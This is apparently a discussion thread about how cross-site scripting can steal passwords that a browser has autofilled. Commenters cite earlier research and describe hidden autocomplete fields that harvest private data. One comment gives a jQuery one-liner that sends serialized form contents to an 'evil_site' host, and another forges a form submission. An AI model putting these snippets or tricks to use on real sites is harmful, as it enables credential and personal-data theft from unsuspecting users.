XSS + "Save your password" = pwned
homakov.blogspot.com
homakov.blogspot.com
For eg. check this presentation from Stratsec at EUSecWest '09[0] specifically slide 35 which talks about exploiting password managers.
see 'Abusing Password Managers with XSS' from Neohapsis[1]
also the Beef project has a module called Get Stored Credentials[2]
The reason it was only one slide in the presentation and so little else has been written about it? First, because it is obvious - when learning XSS after cookies and sessions the next thing most devs go at is the password manager.
And second, it just isn't as interesting when you have so much more you can do with XSS, and tampering with password managers is a narrow vector.
[0] http://www.stratsec.net/getattachment/09ce9a5a-07d2-41ca-843...
[1] http://labs.neohapsis.com/2012/04/25/abusing-password-manage...
what can be better than GETTING PASSWORD(=full power). I know it was known.
However, there is another attack involving auto-complete that is less well known and more concerning. You can hide text input fields with CSS with names such as "address", "phonenumber", etc, and when a user goes to auto-complete their email address - it fills in all of their private info that they might not want that website to have.
You don't need xss on login page. You can have xss on any page and open an iframe/window with login and then steal via same origin
If for some reason my logic is flawed, then a lot of information would have to be denied, essentially and operation on a password input. You'd have to disable and .type, .val, and probably a couple of others on password fields.
Personally I am surprised by this. Afaik you can not copy+paste the password from a password form field, so I just somehow assumed you couldn't get to it via JavaScript, either.
And what's so special about what you've saved? XSS is a security hole and so once a script is injected it doesn't really matter whether it's the prefilled password or a password that gets typed in - it's just perhaps slightly more likely to be there. (But then, I wouldn't think people are in the habit of leaving a filled in login form as it is - I at least would be likely to compulsively submit it and log in.)
Basically Opera doesn't auto-complete unless you click a specific button once the page loads. Then Opera will not only auto complete the password form, but submit it as well.
But the approach depends on the browser software to figure out which button on the page is the login button, rather than relying on the user to figure it out. I've run into one or two websites where Opera got that wrong, meaning the password manager couldn't work.
Everything is a trade-off, I guess.
stealing password >> XSS.
I suspect that other's analysis that the proposed solution is impossible is correct, and JS needs access to the prefilled in password for a lot of auth to work. But it's a valid discussion, and is not rendered moot by simply observing that another security violation has already occurred.
$('form').submit(function(){ $.get('evil_site' + $(this).serialize()) });
(Sorry for jQuery).
But who cares... let the user log in by himself and let him do the bad stuff. $('textarea.comments').val("You smell");
$('form').submit();It is however an interesting vector as it will steal the password without any user interaction or knowledge.
without any redirects and other hijackings